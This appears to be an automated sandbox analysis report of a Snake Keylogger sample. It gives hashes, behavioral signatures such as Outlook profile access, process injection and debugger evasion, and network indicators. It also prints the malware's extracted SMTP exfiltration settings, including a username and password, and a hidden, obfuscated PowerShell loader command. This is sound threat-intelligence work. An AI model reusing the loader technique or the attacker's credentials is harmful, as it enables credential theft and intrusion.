Analysis
-
max time kernel
111s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2024 20:21
Static task
static1
Behavioral task
behavioral1
Sample
4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Sharpness.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Sharpness.ps1
Resource
win10v2004-20241007-en
General
-
Target
4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe
-
Size
662KB
-
MD5
e38257f3eaa78e2dca3c3063b05eaa70
-
SHA1
250d9151f64818a8bfa51d3714a6ddb214303495
-
SHA256
4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853
-
SHA512
483dc9cbef3e26973e0d51601b146472c64b0e2c95b0c98154bd5c2a49afce5b867e9ed56fd9ed9d9e939a0c9c023413aa775078b22873ce267db55f2a7c1bcc
-
SSDEEP
12288:k2QJ9o2sW3B9o2G2/6SkwwOeO01ZAao2tezqrVcO5sZYw6bhyWjX53XOo:kv9o2sW3B9oV2iSkwwOe/U2HVcaNhyaH
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
smtp.securemail.pro - Port:
587 - Username:
[email protected] - Password:
jrpM0Y5k - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/4860-76-0x0000000000C50000-0x0000000001EA4000-memory.dmp family_snakekeylogger behavioral2/memory/4860-77-0x0000000000C50000-0x0000000000C76000-memory.dmp family_snakekeylogger -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1788 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 12 4860 msiexec.exe 14 4860 msiexec.exe 16 4860 msiexec.exe 18 4860 msiexec.exe 22 4860 msiexec.exe 32 4860 msiexec.exe 37 4860 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 drive.google.com 12 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4860 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1788 powershell.exe 4860 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\Macroblast\affejendes.tid 4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 4860 msiexec.exe 4860 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1788 powershell.exe Token: SeIncreaseQuotaPrivilege 1788 powershell.exe Token: SeSecurityPrivilege 1788 powershell.exe Token: SeTakeOwnershipPrivilege 1788 powershell.exe Token: SeLoadDriverPrivilege 1788 powershell.exe Token: SeSystemProfilePrivilege 1788 powershell.exe Token: SeSystemtimePrivilege 1788 powershell.exe Token: SeProfSingleProcessPrivilege 1788 powershell.exe Token: SeIncBasePriorityPrivilege 1788 powershell.exe Token: SeCreatePagefilePrivilege 1788 powershell.exe Token: SeBackupPrivilege 1788 powershell.exe Token: SeRestorePrivilege 1788 powershell.exe Token: SeShutdownPrivilege 1788 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeSystemEnvironmentPrivilege 1788 powershell.exe Token: SeRemoteShutdownPrivilege 1788 powershell.exe Token: SeUndockPrivilege 1788 powershell.exe Token: SeManageVolumePrivilege 1788 powershell.exe Token: 33 1788 powershell.exe Token: 34 1788 powershell.exe Token: 35 1788 powershell.exe Token: 36 1788 powershell.exe Token: SeDebugPrivilege 4860 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2340 wrote to memory of 1788 2340 4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe 86 PID 2340 wrote to memory of 1788 2340 4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe 86 PID 2340 wrote to memory of 1788 2340 4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe 86 PID 1788 wrote to memory of 4860 1788 powershell.exe 90 PID 1788 wrote to memory of 4860 1788 powershell.exe 90 PID 1788 wrote to memory of 4860 1788 powershell.exe 90 PID 1788 wrote to memory of 4860 1788 powershell.exe 90 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe"C:\Users\Admin\AppData\Local\Temp\4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853N.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\Admin\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\syswow64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4860
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
54KB
MD5a455a44aa414354fe74ee543bbf64451
SHA14d73664950e0b77b2f05eebce4e5c3d549cc18ea
SHA256c7dac58dcad45abf34bee7c7567a746fada583c0e734d204ed2f71617c4b7b31
SHA512a9bedcaa864985c0ec2f9eb521983d23f7b58689922f39305d17fa39aa41ef02be8bec3fc99d22caba1c34c56d6d68160f9dea27bc207eda83f97cc47f852fa7
-
Filesize
321KB
MD554daa56b551e061fb6f1295ef32a374e
SHA1250f5859827f66cd522d04cdffa3829dbd933425
SHA2569ad1e96273abfee679b731db48243a170704a4934c5d3f17d4c2d3c796af61c1
SHA5120a5741e91597af9f88364db27494b44a087c3527ee9b643d5fe3b3f23687e3580c8d847a5e53d99933c06bfdfd3a665e3334fab8a93e00d6b7edfb28e717e6c1